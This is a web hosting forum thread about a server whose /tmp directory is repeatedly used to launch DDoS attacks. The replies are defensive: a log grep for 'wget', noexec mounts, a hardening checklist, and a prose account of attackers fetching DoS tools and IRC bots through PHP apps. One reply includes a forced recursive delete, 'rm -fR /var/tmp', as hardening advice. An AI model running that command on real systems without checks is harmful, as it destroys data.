Results 1 to 8 of 8
  1. #1

    /tmp used to DDoS

    Hey guys,
    I have a server that keeps on being used to launch attacks on other people.
    What the person/script is doing is using /tmp to possibly run a script to send out many many packets out.
    Nocster then just shuts off my server and we co-operate with them to try to fix it. They have tried changing the permissions on /tmp, but then it seems like it happens again.
    It has happened almost 6 times now, and they are starting to get angry!!

    Any suggestions?


  2. #2
    Join Date
    Mar 2003
    California USA
    for files in /usr/local/apache/domlogs/*; do grep "wget" $files; done;
    might help find where they are getting in. I suggest hiring a company to check out your server and do a security audit on it.

    are just some of them. search around the forums for companys good with security
    Steven Ciaburri | Proactive Linux Server Management -
    Managed Servers (AS62710), Server Management, and Security Auditing.

  3. #3
    bobcares is offline [email protected]
    Join Date
    Nov 2001
    India, US, Germany
    Mount /tmp and make it non executable.

    Have a nice day

    A student once asked his teacher, "Master, what is enlightenment?"
    The master replied, "When hungry, eat. When tired, sleep. When you need care, come to bobcares...."

  4. #4
    Join Date
    Dec 2001
    Franklin, TN, USA
    How do you know for sure its /tmp?

    Make sure /var/tmp is also mounted as noexec.
    Linux. Problems Solved. | Built for the Hosting Industry
    Server Management. Helpdesk Management. Business Management.
    ( AcuNett, Est. 15 Years, RateLobby 5 Stars )

  5. #5
    Join Date
    May 2002
    Originally posted by AcuNett
    Make sure /var/tmp is also mounted as noexec.
    Often an idea to symlink /var/tmp to /tmp:

    rm -fR /var/tmp; ln -s /tmp /var/tmp
    Clook Internet -
    Fully managed UK based webhosting provider
    Est 2002, 24/7 phone support, all the bells and whistles!

  6. #6
    Join Date
    Jul 2003
    Nothing but, net
    If this has happened 6 times, you may want to hire a qualified system administrator to manage your box for you.

  7. #7

    Look at doing the following (after you wipe the system, restore the os, and restore from a backup made prior to the hack):

    * Disable telnet.
    * Limit SSH access to specific IP addresses.
    * Disable direct root login.
    * Remove unnecessary packages / software.
    * Harden the kernel against synflood and basic DOS attacks.
    * Remove common user access to compilers and fetching software (wget, fetch, lynx, etc.).
    * Ensure /tmp is in its own partition with noexec, nosuid.
    * Ensure kernel and software is up to date.
    * Remove unnecessary users and groups.
    * Install chkrootkit, logwatch, tripwire.
    * Install a firewall, and port scan detector.
    * For Apache servers, install mod_security and configure for use with FrontPage, PHPMyAdmin, Site Studio, and other common applications.
    * Secure DNS Servers
    * Utilize firewall automation to mitigate brute force FTP, syn floods, mail bombs, and out-of-network trojan’d servers from impacting your servers

    It is important to note that security is an ongoing venture. Even if you were to take all of the steps listed above, you would still have a regular routine of review, update, research, patch, etc.

    Thank you.
    Peter M. Abraham
    LinkedIn Profile

  8. #8
    Join Date
    Jul 2003
    The hack you are seeing is done via PHP apps like PHP-Nuke

    I watched a server get hacked real time and they where downloading shell scripts and tarballs or DoS engines and more toys from a remote server and then execute the script and other toys as the user that the web server is running as 'nobody'.

    I have found all sorts of backdoor scripts, eggdrops, bnc and other nasty stuff. One set of files I looked over was also infected with a virus that would infect all the 'ELF' binaries on the server.

    After all of the files have been installed in /tmp a eggdrop bot will join a IRC channel and wait for commands on who to attack next or they are used for other illegal activities like helping distribute warez or stolen information.

    Some links.

    I still have the tarballs from one of the servers that got taken if anyone wants to see the various crap they use.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts